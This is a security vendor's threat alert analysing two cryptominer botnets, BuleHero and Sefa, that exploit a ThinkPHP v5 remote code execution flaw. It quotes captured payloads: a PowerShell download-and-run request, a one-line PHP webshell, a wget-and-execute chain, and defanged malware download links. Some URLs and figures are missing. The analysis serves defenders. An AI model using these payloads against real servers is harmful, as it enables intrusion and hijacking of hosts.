Threat Alert: Multiple Cryptocurrency Miner Botnets Start to Exploit the New ThinkPHP Vulnerability

By SangYi,

In security, a vulnerability constitutes the ‘attack surface’- a weakness which can be, at some point, exploited by an attacker. Recently, Alibaba Cloud security team has reported a new, high-risk vulnerability in ThinkPhP framework (

Today the team reports on new attacks that already use this vulnerability: two botnets, BuleHero and Sefa, took notice of the new ‘attack surface’, and exploited it to compromise hosts and use them for various cybercrime purposes. We’re no longer dealing now with theories or potential exploitations, but with actual attacks. The ThinkPHP vulnerability is too common to ignore, and it is highly recommended to take immediate action to block it.

Yohai Einav

Principal Security Researcher, SIL


Recently, Alibaba Cloud security researchers detected that several cryptocurrency miner botnets have begun to exploit this new ThinkPHP vulnerability to propagate themselves. The researchers have successfully captured the traffic of these botnets, and this document provides an analysis of their activities.

Analysis highlights:

Both botnets propagate using worms.

  1. BuleHero, one of the two botnets, propagates through internal networks.
  2. Hosts that have the ThinkPHP vulnerability and are exposed to the Internet are at a high risk of being infected by this worm.
  3. Once a host is infected it joins a botnet and is used for cryptocurrency mining.
  4. Cryptocurrency mining tasks consume the host’s CPU resources and significantly slows its routine activities.
  5. Sefa, the second botnet, is an IoT botnet which attempts to seize control of hosts using the ThinkPHP vulnerability.

This new vulnerability in ThinkPHP v5 is very critical and could cause significant damage. Alibaba Cloud’s Security researchers predict that more botnet are going to exploit this vulnerability to propagate. We strongly suggest users be on the alert and use the solutions described at the end of this article to prevent attacks.

Detailed Analysis of Bule Hero

Alibaba Cloud security team found that Bulehero had begun to use ThinkPHP remote commands to launch vulnerability attacks and propagate since December 19.

Vulnerability Exploitation

Vulnerability exploitation method #1:

This method directly runs PowerShell code to launch attacks against payload:

s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient). DownloadFile('','C:/15.exe');start C:/15.exe

Vulnerability exploitation method #2:

This method exploits the vulnerability to upload a webshell named hydra.php, which can run backdoor commands and then execute PowerShell code to launch attacks against payload1:

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<? php $action = $_GET['xcmd'];system($action);? ^>>hydra.php

Launch attacks against payload2:

/hydra.php? xcmd=cmd.exe /c powershell (new-object System.Net.WebClient). DownloadFile('','C:/10.exe');start C:/10.exe

Threat to Internal Networks

The IP segment contains segment B of the local network, segment B of the corresponding public network and the randomly generated public network address. BuleHero first uses the EternalBlue exploit ( ) and “ipc$” to launch brute-force attacks against port 445 and port 139 before exploiting the Web framework vulnerabilities to implement intrusion.

Figure 1: Generate scanned addresses

Figure 2: Scan the internal network addresses

Figure 3: Exploit the ThinkPHP v5 vulnerability

BuleHero Cyberattack Trend

Additional vulnerability exploitation methods used by BuleHero include:

  1. Tomcat PUT arbitrary file upload vulnerability (CVE-2017–12615)
  2. Exploits this vulnerability to upload a webshell named FxCodeShell.jsp, which can download and execute files:
  • /FxCodeShell.jsp? wiew=FxxkMyLie1836710Aa&os=1&address=
  1. Struts2 remote code execution vulnerability (CVE-2017–5638)
  2. WebLogic WLS component remote code execution vulnerability (CVE-2017–10271)
  3. EternalBlue vulnerability (MS-17–010)
  4. ipc$ brute-force attack (use weak passwords for launching brute-force attacks first and then Mimikatz for elevating permissions)

Detailed Analysis of Sefa

Vulnerability Exploitation

Attack and exploit payload:

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget;chmod 777;sh

Shell file:

Attack module de-compilation (XOR key: 0x04)

Launch attacks against payload:

Security Recommendations

  1. Users who cannot immediately upgrade ThinkPHP v5 to the latest version are advised to use Alibaba Cloud’s Web Application Firewall (WAF) to protect against attacks and ensure normal business operations.
  2. Users who have purchased Cloud Firewall provided by Alibaba Cloud can enable the Cloud IPS function interception mode and the virtual patch feature. Cloud Firewall supports automatic protection and blocking of the preceding attack methods.
  3. In addition, Managed Security Services (MSS) can be used you to strengthen and optimize network security with the help of Alibaba Cloud security experts and prevent systems from the aforementioned attacks.


Malicious Links

hxxp://205[.] 185[.] 113[.]123/

hxxp://205[.] 185[.] 113[.]123/mcoin
hxxp://205[.] 185[.] 113[.]123/bins/sefa.x86
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm7
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm5
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm6
hxxp://205[.] 185[.] 113[.]123/bins/sefa.m68k
hxxp://205[.] 185[.] 113[.]123/bins/sefa.mips
hxxp://205[.] 185[.] 113[.]123/bins/sefa.mpsl
hxxp://205[.] 185[.] 113[.]123/bins/sefa.ppc

Malicious Files


Follow me to keep abreast with the latest technology news, industry insights, and developer trends.